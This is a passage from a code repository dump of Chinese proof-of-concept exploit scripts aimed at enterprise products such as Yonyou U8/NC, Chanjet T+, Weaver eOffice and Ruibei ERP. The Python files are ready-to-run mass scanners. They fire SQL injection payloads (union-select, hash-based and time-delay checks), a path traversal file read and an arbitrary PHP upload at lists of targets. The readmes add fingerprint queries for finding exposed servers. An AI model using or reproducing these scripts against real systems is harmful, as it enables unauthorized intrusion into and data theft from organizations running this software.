"/servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1%27+union+select+sys.fn_varbintohexstr(hashbytes(%27md5%27,%271%27))--+" 40 | url = target + path 41 | headers = { 42 | "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36", 43 | } 44 | 45 | try: 46 | # conn = http.client.HTTPConnection(target) 47 | # conn.request("POST", path, body.encode("utf-8"), headers) 48 | # response1 = conn.getresponse() 49 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 50 | 51 | 52 | if response1.status_code == 200 and "c4ca4238a0b923820dcc509a6f75849b" in response1.text: 53 | print(f"[++++++] {target} 存在sql") 54 | with open("result.txt", "a+", encoding="utf-8") as f: 55 | f.write(target + "\n") 56 | else: 57 | print(f"[-] {target} 未发现") 58 | 59 | except Exception as e: 60 | print(f"[*] {target} error: {str(e)}") 61 | 62 | 63 | def extract_host(url): 64 | """ 65 | 从 URL 中提取主机地址和端口号,返回 (host, port) 66 | """ 67 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 68 | if match: 69 | prefix, host, port = match.groups() 70 | if not port: 71 | if prefix and "https" in prefix: 72 | port = "443" 73 | else: 74 | port = "80" 75 | return host, int(port) 76 | else: 77 | return None, None 78 | 79 | 80 | def main(): 81 | banner() 82 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 83 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 84 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 85 | args = parser.parse_args() 86 | 87 | if args.url and not args.file: 88 | if "https://" in args.url or "http://" in args.url: 89 | url = args.url 90 | else: 91 | host, port = extract_host(args.url) 92 | url = f"http://{host}:{port}" 93 | poc(url) 94 | 95 | elif args.url is None and args.file is not None: 96 | url_list = [] 97 | with open(args.file, "r", encoding="utf-8") as f: 98 | for url in f.readlines(): 99 | url = url.strip().replace("\n", "") 100 | if "https://" in url or "http://" in url: 101 | url = url 102 | else: 103 | host, port = extract_host(url) 104 | url = f"http://{host}:{port}" 105 | url_list.append(url) 106 | 107 | pool = Pool(10) 108 | pool.map(poc, url_list) 109 | pool.close() 110 | pool.join() 111 | 112 | else: 113 | parser.print_help() 114 | 115 | 116 | if __name__ == '__main__': 117 | main() 118 | -------------------------------------------------------------------------------- /20240327某友时空KSOA imagefield接口SQL注入漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 用友NC runScript接口存在SQL注入漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | body="UClient.dmg"||app="用友-U8-Cloud" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | 22 | 23 | ![image-20240307092017883](assets/image-20240307092017883.png) 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /20240328某凌EIS智慧协同平台doc_fileedit_word.aspxSQL注入/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240328某凌EIS智慧协同平台doc_fileedit_word.aspxSQL注入/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240328某凌EIS智慧协同平台doc_fileedit_word.aspxSQL注入/readme.md: -------------------------------------------------------------------------------- 1 | # 某凌EIS智慧协同平台doc_fileedit_word.aspxSQL注入 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | app="Landray-EIS智慧协同平台" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | 22 | 23 | ![image-20240307092017883](assets/image-20240307092017883.png) 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /20240331用友U8-nc.bs.sm.login2.RegisterServlet SQL注入/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240331用友U8-nc.bs.sm.login2.RegisterServlet SQL注入/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240331用友U8-nc.bs.sm.login2.RegisterServlet SQL注入/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 用友U8-nc.bs.sm.login2.RegisterServlet SQL注入 poc 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = "/servlet/~uap/nc.bs.sm.login2.RegisterServlet?usercode=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL--%20Jptd" 40 | url = target + path 41 | headers = { 42 | 'X-Forwarded-For': '127.0.0.1', 43 | 'Cookie': 'JSESSIONID=D523370AE42E1D2363160250C914E62A.server' 44 | } 45 | 46 | try: 47 | # conn = http.client.HTTPConnection(target) 48 | # conn.request("POST", path, body.encode("utf-8"), headers) 49 | # response1 = conn.getresponse() 50 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 51 | 52 | 53 | if response1.status_code == 200 : 54 | print(f"[++++++] {target} 存在sql") 55 | with open("result.txt", "a+", encoding="utf-8") as f: 56 | f.write(target + "\n") 57 | else: 58 | print(f"[-] {target} 未发现") 59 | 60 | except Exception as e: 61 | print(f"[*] {target} error: {str(e)}") 62 | 63 | 64 | def extract_host(url): 65 | """ 66 | 从 URL 中提取主机地址和端口号,返回 (host, port) 67 | """ 68 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 69 | if match: 70 | prefix, host, port = match.groups() 71 | if not port: 72 | if prefix and "https" in prefix: 73 | port = "443" 74 | else: 75 | port = "80" 76 | return host, int(port) 77 | else: 78 | return None, None 79 | 80 | 81 | def main(): 82 | banner() 83 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 84 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 85 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 86 | args = parser.parse_args() 87 | 88 | if args.url and not args.file: 89 | if "https://" in args.url or "http://" in args.url: 90 | url = args.url 91 | else: 92 | host, port = extract_host(args.url) 93 | url = f"http://{host}:{port}" 94 | poc(url) 95 | 96 | elif args.url is None and args.file is not None: 97 | url_list = [] 98 | with open(args.file, "r", encoding="utf-8") as f: 99 | for url in f.readlines(): 100 | url = url.strip().replace("\n", "") 101 | if "https://" in url or "http://" in url: 102 | url = url 103 | else: 104 | host, port = extract_host(url) 105 | url = f"http://{host}:{port}" 106 | url_list.append(url) 107 | 108 | pool = Pool(10) 109 | pool.map(poc, url_list) 110 | pool.close() 111 | pool.join() 112 | 113 | else: 114 | parser.print_help() 115 | 116 | 117 | if __name__ == '__main__': 118 | main() 119 | -------------------------------------------------------------------------------- /20240331用友U8-nc.bs.sm.login2.RegisterServlet SQL注入/readme.md: -------------------------------------------------------------------------------- 1 | # 用友U8-nc.bs.sm.login2.RegisterServlet SQL注入 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | app="用友-U8-Cloud" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | 22 | 23 | ![image-20240307092017883](assets/image-20240307092017883.png) 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /20240405maxView系统dynamiccontent.properties.xhtml远程代码执行漏洞/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240405maxView系统dynamiccontent.properties.xhtml远程代码执行漏洞/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240405maxView系统dynamiccontent.properties.xhtml远程代码执行漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # maxView系统dynamiccontent.properties.xhtml远程代码执行漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | "/manager/com/pmc/maxview/footer/TermsOfUse.xhtml" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | 22 | 23 | ![image-20240307092017883](assets/image-20240307092017883.png) 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /20240406万户ezOFFICE-wf_printnum.jspSQL注入漏洞/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240406万户ezOFFICE-wf_printnum.jspSQL注入漏洞/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240406万户ezOFFICE-wf_printnum.jspSQL注入漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 万户ezOFFICE-wf_printnum.jsp存在SQL注入漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | "Ezoffice" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | 22 | 23 | ![image-20240307092017883](assets/image-20240307092017883.png) 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /20240407畅捷通T+ KeyInfoList.aspx SQL漏洞/assets/Snipaste_2024-04-07_21-14-08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240407畅捷通T+ KeyInfoList.aspx SQL漏洞/assets/Snipaste_2024-04-07_21-14-08.png -------------------------------------------------------------------------------- /20240407畅捷通T+ KeyInfoList.aspx SQL漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 畅捷通T+ KeyInfoList.aspx SQL漏洞 poc 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = "/tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+" 40 | url = target + path 41 | headers = { 42 | 'User-Agent': 'Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36', 43 | 'Accept-Charset': 'utf-8', 44 | 'Accept-Encoding': 'gzip, deflate', 45 | 'Connection': 'close' 46 | } 47 | 48 | 49 | try: 50 | # conn = http.client.HTTPConnection(target) 51 | # conn.request("POST", path, body.encode("utf-8"), headers) 52 | # response1 = conn.getresponse() 53 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 54 | 55 | if response1.status_code == 200 and "e10adc3949ba59abbe56e057f20f883e" in response1.text: 56 | print(f"[++++++] {target} 存在sql") 57 | # print("响应体内容:", response1.text) 58 | with open("result.txt", "a+", encoding="utf-8") as f: 59 | f.write(target + "\n") 60 | else: 61 | print(f"[-] {target} 未发现") 62 | 63 | except Exception as e: 64 | print(f"[*] {target} error: {str(e)}") 65 | 66 | 67 | def extract_host(url): 68 | """ 69 | 从 URL 中提取主机地址和端口号,返回 (host, port) 70 | """ 71 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 72 | if match: 73 | prefix, host, port = match.groups() 74 | if not port: 75 | if prefix and "https" in prefix: 76 | port = "443" 77 | else: 78 | port = "80" 79 | return host, int(port) 80 | else: 81 | return None, None 82 | 83 | 84 | def main(): 85 | banner() 86 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 87 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 88 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 89 | args = parser.parse_args() 90 | 91 | if args.url and not args.file: 92 | if "https://" in args.url or "http://" in args.url: 93 | url = args.url 94 | else: 95 | host, port = extract_host(args.url) 96 | url = f"http://{host}:{port}" 97 | poc(url) 98 | 99 | elif args.url is None and args.file is not None: 100 | url_list = [] 101 | with open(args.file, "r", encoding="utf-8") as f: 102 | for url in f.readlines(): 103 | url = url.strip().replace("\n", "") 104 | if "https://" in url or "http://" in url: 105 | url = url 106 | else: 107 | host, port = extract_host(url) 108 | url = f"http://{host}:{port}" 109 | url_list.append(url) 110 | 111 | pool = Pool(10) 112 | pool.map(poc, url_list) 113 | pool.close() 114 | pool.join() 115 | 116 | else: 117 | parser.print_help() 118 | 119 | 120 | if __name__ == '__main__': 121 | main() 122 | -------------------------------------------------------------------------------- /20240407畅捷通T+ KeyInfoList.aspx SQL漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 畅捷通T+ KeyInfoList.aspx SQL漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | app="畅捷通-TPlus" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | ![Snipaste_2024-04-07_21-14-08](assets/Snipaste_2024-04-07_21-14-08.png) 22 | -------------------------------------------------------------------------------- /20240409用友NC Cloud importhttpscer任意文件上传/assets/Snipaste_2024-04-07_21-14-08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240409用友NC Cloud importhttpscer任意文件上传/assets/Snipaste_2024-04-07_21-14-08.png -------------------------------------------------------------------------------- /20240409用友NC Cloud importhttpscer任意文件上传/readme.md: -------------------------------------------------------------------------------- 1 | # 用友NC Cloud importhttpscer任意文件上传- 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | app="用友-NC-Cloud" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | ![Snipaste_2024-04-07_21-14-08](assets/Snipaste_2024-04-07_21-14-08.png) 22 | -------------------------------------------------------------------------------- /20240412weaver-eoffice-webservice文件上传/assets/Snipaste_2024-04-07_21-14-08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240412weaver-eoffice-webservice文件上传/assets/Snipaste_2024-04-07_21-14-08.png -------------------------------------------------------------------------------- /20240412weaver-eoffice-webservice文件上传/poc.py: -------------------------------------------------------------------------------- 1 | import requests,re,urllib3 2 | from hashlib import md5 3 | import base64 4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 5 | def randomInt(s,e): 6 | import random 7 | key=random.randint(int(s),int(e)) 8 | return key 9 | def randomLowercase(n): 10 | key="" 11 | zf="qwertyuiopasdfghjklzxcvbnm" 12 | import random 13 | for _ in range(n): 14 | suiji1=random.randint(0,len(zf)-1) 15 | key+=zf[suiji1] 16 | return key 17 | r1=randomLowercase(6) 18 | rand=randomInt(1000,9999) 19 | def scan(baseurl): 20 | url=baseurl+"webservice/upload/upload.php" 21 | headers = { 22 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0', 23 | 'Accept-Encoding': 'gzip, deflate, br', 24 | 'Content-Type': 'multipart/form-data; boundary=--------------------------553898708333958420021355' 25 | } 26 | data = f'''----------------------------553898708333958420021355\r 27 | Content-Disposition: form-data; name="file"; filename="{r1}.php4"\r 28 | Content-Type: application/octet-stream\r 29 | \r 30 | {rand}{r1}\r 31 | ----------------------------553898708333958420021355--''' 32 | response = requests.post(url=url,headers=headers,data=data,verify=False,timeout=15) 33 | filepath=response.text.strip().replace('*','/') 34 | url=baseurl+f'attachment/{filepath}' 35 | headers = { 36 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0', 37 | } 38 | response = requests.get(url=url,headers=headers,verify=False,timeout=15) 39 | if str(rand)+r1 in response.text: 40 | return True 41 | else: 42 | return False 43 | -------------------------------------------------------------------------------- /20240412weaver-eoffice-webservice文件上传/readme.md: -------------------------------------------------------------------------------- 1 | # weaver-eoffice-webservice文件上传 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | app="泛微-EOffice" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | ![Snipaste_2024-04-07_21-14-08](assets/Snipaste_2024-04-07_21-14-08.png) 22 | -------------------------------------------------------------------------------- /20240414用友-U8C-SQL注入-FormulaViewAction/assets/Snipaste_2024-04-07_21-14-08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240414用友-U8C-SQL注入-FormulaViewAction/assets/Snipaste_2024-04-07_21-14-08.png -------------------------------------------------------------------------------- /20240414用友-U8C-SQL注入-FormulaViewAction/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 用友-U8C-SQL注入-FormulaViewAction poc 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = "/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.FormulaViewAction&method=execute&repID=1')%20WAITFOR%20DELAY%20'0:0:5'--+&unitID=public" 40 | url = target + path 41 | headers = { 42 | "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info" 43 | } 44 | 45 | 46 | try: 47 | # conn = http.client.HTTPConnection(target) 48 | # conn.request("POST", path, body.encode("utf-8"), headers) 49 | # response1 = conn.getresponse() 50 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 51 | 52 | if response1.status_code == 200 and response1.elapsed.total_seconds() > 4: 53 | print(f"[++++++] {target} 存在sql") 54 | # print("响应体内容:", response1.text) 55 | with open("result.txt", "a+", encoding="utf-8") as f: 56 | f.write(target + "\n") 57 | else: 58 | print(f"[-] {target} 未发现") 59 | 60 | except Exception as e: 61 | print(f"[*] {target} error: {str(e)}") 62 | 63 | 64 | def extract_host(url): 65 | """ 66 | 从 URL 中提取主机地址和端口号,返回 (host, port) 67 | """ 68 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 69 | if match: 70 | prefix, host, port = match.groups() 71 | if not port: 72 | if prefix and "https" in prefix: 73 | port = "443" 74 | else: 75 | port = "80" 76 | return host, int(port) 77 | else: 78 | return None, None 79 | 80 | 81 | def main(): 82 | banner() 83 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 84 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 85 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 86 | args = parser.parse_args() 87 | 88 | if args.url and not args.file: 89 | if "https://" in args.url or "http://" in args.url: 90 | url = args.url 91 | else: 92 | host, port = extract_host(args.url) 93 | url = f"http://{host}:{port}" 94 | poc(url) 95 | 96 | elif args.url is None and args.file is not None: 97 | url_list = [] 98 | with open(args.file, "r", encoding="utf-8") as f: 99 | for url in f.readlines(): 100 | url = url.strip().replace("\n", "") 101 | if "https://" in url or "http://" in url: 102 | url = url 103 | else: 104 | host, port = extract_host(url) 105 | url = f"http://{host}:{port}" 106 | url_list.append(url) 107 | 108 | pool = Pool(10) 109 | pool.map(poc, url_list) 110 | pool.close() 111 | pool.join() 112 | 113 | else: 114 | parser.print_help() 115 | 116 | 117 | if __name__ == '__main__': 118 | main() 119 | -------------------------------------------------------------------------------- /20240414用友-U8C-SQL注入-FormulaViewAction/readme.md: -------------------------------------------------------------------------------- 1 | # 用友-U8C-SQL注入-FormulaViewAction 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | app="用友-U8-Cloud" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | ![Snipaste_2024-04-07_21-14-08](assets/Snipaste_2024-04-07_21-14-08.png) 22 | -------------------------------------------------------------------------------- /20240415王道汽车4S企业管理系统 SQL注入漏洞/assets/Snipaste_2024-04-07_21-14-08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240415王道汽车4S企业管理系统 SQL注入漏洞/assets/Snipaste_2024-04-07_21-14-08.png -------------------------------------------------------------------------------- /20240415王道汽车4S企业管理系统 SQL注入漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 王道汽车4S企业管理系统 SQL注入漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | body="PixelsPerInch" && body="AxBorderStyle" && body="DropTarget" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | ![Snipaste_2024-04-07_21-14-08](assets/Snipaste_2024-04-07_21-14-08.png) 22 | -------------------------------------------------------------------------------- /20240416睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞/assets/Snipaste_2024-04-07_21-14-08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240416睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞/assets/Snipaste_2024-04-07_21-14-08.png -------------------------------------------------------------------------------- /20240416睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞 poc 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = "/appPatchDownLoad?fileName=../../../../RebeeCRM/_RebeeCRM_installation/installvariables.properties" 40 | url = target + path 41 | headers = { 42 | "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", 43 | "Connection": "close", 44 | "Accept-Encoding": "gzip, deflate", 45 | } 46 | 47 | try: 48 | # conn = http.client.HTTPConnection(target) 49 | # conn.request("POST", path, body.encode("utf-8"), headers) 50 | # response1 = conn.getresponse() 51 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 52 | 53 | if response1.status_code == 200 : 54 | print(f"[++++++] {target} 存在任意文件读取") 55 | # print("响应体内容:", response1.text) 56 | with open("result.txt", "a+", encoding="utf-8") as f: 57 | f.write(target + "\n") 58 | else: 59 | print(f"[-] {target} 未发现") 60 | 61 | except Exception as e: 62 | print(f"[*] {target} error: {str(e)}") 63 | 64 | 65 | def extract_host(url): 66 | """ 67 | 从 URL 中提取主机地址和端口号,返回 (host, port) 68 | """ 69 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 70 | if match: 71 | prefix, host, port = match.groups() 72 | if not port: 73 | if prefix and "https" in prefix: 74 | port = "443" 75 | else: 76 | port = "80" 77 | return host, int(port) 78 | else: 79 | return None, None 80 | 81 | 82 | def main(): 83 | banner() 84 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 85 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 86 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 87 | args = parser.parse_args() 88 | 89 | if args.url and not args.file: 90 | if "https://" in args.url or "http://" in args.url: 91 | url = args.url 92 | else: 93 | host, port = extract_host(args.url) 94 | url = f"http://{host}:{port}" 95 | poc(url) 96 | 97 | elif args.url is None and args.file is not None: 